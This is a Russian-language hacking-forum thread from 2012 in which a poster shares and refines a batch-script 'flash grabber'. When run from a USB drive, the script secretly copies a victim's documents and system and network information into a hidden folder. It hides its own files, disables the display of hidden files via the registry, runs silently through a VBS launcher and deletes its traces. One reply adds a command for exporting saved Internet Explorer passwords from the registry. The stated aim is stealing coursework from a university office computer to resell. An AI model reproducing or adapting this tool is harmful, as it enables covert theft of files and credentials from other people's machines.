Флеш граббер на бате
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Флеш граббер на бате - 2012-03-28 17:35:33.946666
|
|
|
twist1
Сообщений: 134
Оценки: 0
Присоединился: 2012-03-26 17:24:52.993333
|
Продолжение темы: http://forum.xakep.ru/m_2643955/mpage_1/key_/tm.htm#2643955
Пару дней назад написал простенький флеш грабер на бате с целью завладения накопленной за многие годы огромной кучей курсачей, лаб, чертежей и прочих полезностей с компа деканата и облегчения себе жизни на оставшиеся 2 года обучения в универе. Главной целью и одновременно проблемой в создании граббера было сделать его независимым от назначенной рандомной машиной буквы флешки. Гугл и добрые люди выручают, так что и я Вот решил поделиться:
Сперва создаём батник, который соберёт некоторую инфу о машине с именем collect_info.bat и следующим кодом: (это для примера, у каждого фантазия разная)
mkdir c:\info
cd /d c:
tree > c:\info\tree.rtf
chdir %userprofile%\desktop
tree > c:\info\desktop_tree.rtf
tree /F > c:\info\desktop_tree_files.rtf
systeminfo > c:\info\system_log.rtf
net user >> c:\info\system_log.rtf
ipconfig /all > c:\info\inet.rtf
netstat -a >> c:\info\inet.rtf
exit
Теперь создаём батник с именем "hi.bat" и таким кодом: (он будет основным)
attrib %CD%hi.exe +h /S /D \\скрываем скомпилированый батник сразу после открытия
mkdir %CD%stolen\%USERNAME%\ \\создаем папку "stolen" и подпапку с именем пользователя в корне флешки
attrib %CD%stolen +h /S /D \\скрываем их
MD %CD%\stolen\%USERNAME%\user_documents \\создаем папку для документов
xcopy %userprofile%\documents %CD%\stolen\%USERNAME%\user_documents /S /E /J \\копируем все доки с винта в нее
MD %CD%\stolen\%USERNAME%\user_info \\создаём папку для инфы о компе, которую для нас соберет второй батник
start /wait collect_info.exe \\тут открывается батник для сбора инфы
xcopy c:\info %CD%\stolen\%USERNAME%\user_info /S /E /J \\копируем с него инфу в созданную ранее папку на флешке
rmdir /s /q c:\info \\удаляем папку с винта
exit
после создания оба батника компилируем в *exe
можно конечно создать еще один батник, который за собой все подчистит, кроме корневой папки "stolen" и тоже вписать его командой start /wait [……] , но это для особых педантов))).
В итоге, у нас создается скрытая папка на флешке, в которой находится папка, название которой совпадает с именем юзера. а уже в ней вся инфа.
Итак, исходя из того, что доступ к компу в деканате я имею многократный (за семестр по неск. раз), то на первый заход может хватить только батника для сбора инфы, а конкретно, команд tree и
tree /F . А уже на второй раз, прописав дома необходимые пути к каталогам и файлам, взять с компа все что нужно)) может быть потом за бабки толкнуть кому-нибудь) Надеюсь, идея многим понравилась, всё-таки, думаю, большинство из нас студенты) Каждый сможет что-то переделать под себя если что)
|
|
|
|
|
RE: Флеш граббер на бате - 2012-03-29 20:09:28.926666
|
|
|
twist1
Сообщений: 134
Оценки: 0
Присоединился: 2012-03-26 17:24:52.993333
|
Подправил код:
отныне все происходит в одном файле. теперь не нужно создавать отдельный файл collect_info.bat - теперь он создается сам и "по-тихому" запускается скриптом collect_info.vbs, который так же создается сам. Оба этих файла создаются с атрибутом "скрытый" и впоследствии самоудаляются.
Так как я сторонник минимализма, то я сделал так, чтобы два этих файла были в скрытой папке stolen:) и не занимали место в корне флэшки)))
Итак, в конечном итоге всё вышло так:
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ /v Hidden /d 0 /f \\сразу откл. отображение скрытых папок и файлов
attrib %CD%hi.exe +h /S /D
mkdir %CD%stolen\%USERNAME%\
attrib %CD%stolen +h /S /D
MD %CD%\stolen\%USERNAME%\user_documents
xcopy %userprofile%\documents %CD%\stolen\%USERNAME%\user_documents /S /E /J
MD %CD%\stolen\%USERNAME%\user_info
echo mkdir c:\info > %CD%stolen\collect_info.bat \\создаем батник для сбора инфы и вписываем в него команды ниже
attrib collect_info.bat +h /S /D \\делаем его скрытым
echo cd /d c: >> %CD%stolen\collect_info.bat
echo chdir c:\users >> %CD%stolen\collect_info.bat
echo tree /F ^> c:\info\user_tree.rtf >> %CD%stolen\collect_info.bat
echo chdir %PROGRAMFILES% >> %CD%stolen\collect_info.bat
echo tree ^> c:\info\program_files_tree.rtf >> %CD%stolen\collect_info.bat
echo systeminfo ^> c:\info\system_log.rtf >> %CD%stolen\collect_info.bat
echo net user ^>^> c:\info\system_log.rtf >> %CD%stolen\collect_info.bat
echo ipconfig /all ^> c:\info\inet.rtf >> %CD%stolen\collect_info.bat
echo netstat -a ^>^> c:\info\inet.rtf >> %CD%stolen\collect_info.bat
echo exit >> %CD%stolen\collect_info.bat
echo Dim oShell > %CD%stolen\collect_info.vbs \\создаем скрипт для запуска
attrib collect_info.vbs +h /S /D \\и его делаем скрытым
echo Set oShell = Wsсriрt.CreateObject ("Wsсriрt.shell") >> %CD%stolen\collect_info.vbs
echo oShell.run "%CD%stolen\collect_info.bat", 0 >> %CD%stolen\collect_info.vbs
echo Set oShell = Nothing >> %CD%stolen\collect_info.vbs
start /wait %CD%stolen\collect_info.vbs
timeout 60 \\таймаут можно выставить любой, но тут "на верочку"))
del %CD%stolen\collect_info.bat /Q /F /A -S -H -R -A \\удаляем временные файлы
del %CD%stolen\collect_info.vbs /Q /F /A -S -H -R -A
xcopy c:\info %CD%\stolen\%USERNAME%\user_info /S /E /J
rmdir /s /q c:\info
attrib %CD%hi.exe -h /S /D \\восстанавливаем атрибут из скрытого в видимый, что будет служить индикатором того, что данные скачались
exit
граббер по-прежднему остается независимым от назначенной компом буквы для флэшки на которой он лежит.
не забываем компилировать в экзешник, так как вторая строка именно для *exe.
Что писать (брать с компа) после строки xcopy %userprofile%\documents %CD%\stolen\%USERNAME%\user_documents /S /E /J это уже дело фантазии..главной идеей было сделать граббер работающим при любой букве, заданной для флэшки. так что не судите строго)
единственной проблемой остается тема с таймаутом, так как как только запускается скрипт - основной батник продолжает работать, потому что скрипт закрывается, запуская второй батник в "невидимом" режие…. а основной его в этот момент удаляет. поэтому лучше таймаута ничего не придумал. может что подскажете?
|
|
|
|
|
RE: Флеш граббер на бате - 2012-03-29 22:08:24.473333
|
|
|
zzsnn
Сообщений: 7459
Оценки: 680
Присоединился: 2007-09-25 07:17:14.240000
|
Спасибо.
|
|
|
|
|
RE: Флеш граббер на бате - 2012-03-30 18:11:27.180000
|
|
|
naxzax
Сообщений: 382
Оценки: 0
Присоединился: 2012-01-22 21:33:59.246666
|
twist1 а можешь кинуть это всё в zip архиве уже зделаное?
|
|
|
|
|
RE: Флеш граббер на бате - 2012-03-30 18:14:52.636666
|
|
|
twist1
Сообщений: 134
Оценки: 0
Присоединился: 2012-03-26 17:24:52.993333
|
Да не вопрос, пиши мыло. Но что может быть проще чем просто скопировать код и сохранить его в формате *bat:D
|
|
|
|
|
RE: Флеш граббер на бате - 2012-04-02 05:39:24.796666
|
|
|
twist1
Сообщений: 134
Оценки: 0
Присоединился: 2012-03-26 17:24:52.993333
|
quote:
ORIGINAL: zzsnn
Спасибо.
Пожалуйста)
|
|
|
|
|
RE: Флеш граббер на бате - 2012-04-02 13:59:31.580000
|
|
|
naxzax
Сообщений: 382
Оценки: 0
Присоединился: 2012-01-22 21:33:59.246666
|
twist1 заранее спасибо!
renad91@yandex.ru
|
|
|
|
|
RE: Флеш граббер на бате - 2012-04-07 12:57:23.746666
|
|
|
keny2402
Сообщений: 1
Оценки: 0
Присоединился: 2012-04-06 15:13:54.066666
|
xcopy %userprofile%\documents %CD%\stolen\%USERNAME%\user_documents /S /E /J
а как заменить вот эту строчку , мне например нужны пароли от эксплоира , как мне заменить так что бы они оказались у меня на флешки , и почту тоже надо !
|
|
|
|
|
RE: Флеш граббер на бате - 2012-04-07 14:58:01.830000
|
|
|
twist1
Сообщений: 134
Оценки: 0
Присоединился: 2012-03-26 17:24:52.993333
|
Пароли от IE хранятся в %userprofile%\cookies
и в реестре по ключу HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\SPW
так что строки будут такие:
1. По ключу реестра: (вставляешь эту строку вместо xcopy %userprofile%\documents %CD%\stolen\%USERNAME%\user_documents /S /E /J)
reg export "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\SPW" c:\info\spw.reg
(дальше папка info копируется на флэшку и удалится)
2. Какую почту? грабером почту на флэшку?)) может ты еще хочешь чтобы туда деньги закинулись?:D:D:D
|
|
|
|
|
RE: Флеш граббер на бате - 2012-04-08 15:27:02.260000
|
|
|
pavlikuls
Сообщений: 10
Оценки: -10
Присоединился: 2012-02-25 18:48:36.196666
|
мне скиньте готовый граббер на pavlikuls@yandex.ru
Спасибо
|
|
|
|
|
RE: Флеш граббер на бате - 2012-04-08 17:06:43.836666
|
|
|
twist1
Сообщений: 134
Оценки: 0
Присоединился: 2012-03-26 17:24:52.993333
|
Вот конечный исходник, который можно менять как вам хочется. (показано на примере папки "Мои Документы"
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ /v Hidden /d 0 /f
mkdir %CD%stolen\%USERNAME%\
attrib %CD%stolen +h /S /D
MD %CD%\stolen\%USERNAME%\user_documents
xcopy %userprofile%\documents %CD%\stolen\%USERNAME%\user_documents /S /E /J
set infobat=%CD%stolen\collect_info.bat
set infovbs=%CD%stolen\collect_info.vbs
echo mkdir c:\info > %infobat%
attrib collect_info.bat +h /S /D
echo cd /d c: >> %infobat%
echo chdir c:\users >> %infobat%
echo tree /F ^> c:\info\user_tree.rtf >> %infobat%
echo chdir %PROGRAMFILES% >> %infobat%
echo tree ^> c:\info\program_files_tree.rtf >> %infobat%
echo systeminfo ^> c:\info\system_log.rtf >> %infobat%
echo net user ^>^> c:\info\system_log.rtf >> %infobat%
echo ipconfig /all ^> c:\info\inet.rtf >> %infobat%
echo netstat -a ^>^> c:\info\inet.rtf >> %infobat%
echo exit >> %infobat%
echo Dim oShell > %infovbs%
attrib collect_info.vbs +h /S /D
echo Set oShell = WScript.CreateObject ("WSCript.shell") >> %infovbs%
echo oShell.run "%CD%stolen\collect_info.bat", 0 >> %infovbs%
echo Set oShell = Nothing >> %infovbs%
start /wait %infovbs%
timeout 40
del %infobat% /Q /F /A -S -H -R -A
del %infovbs% /Q /F /A -S -H -R -A
MD %CD%\stolen\%USERNAME%\user_info
xcopy c:\info %CD%\stolen\%USERNAME%\user_info /S /E /J
rmdir /s /q c:\info
exit
quote:
мне скиньте готовый граббер на pavlikuls@yandex.ru
Спасибо
Он и есть уже готовый . Паря, что может быть проще чем скопировать код и сохранить в bat?? И потом закомпилировать любым компилятором (например этим: http://forum.xakep.ru/m_2452672/tm.htm), нажав всего 2 кнопки…. Если тебе это лень сделать, при том, что я более чем подробно все описал, то граббер тебе просто не нужен. Почитай лучше книжку. Лучше о dos`e
|
|
|
|
|
|
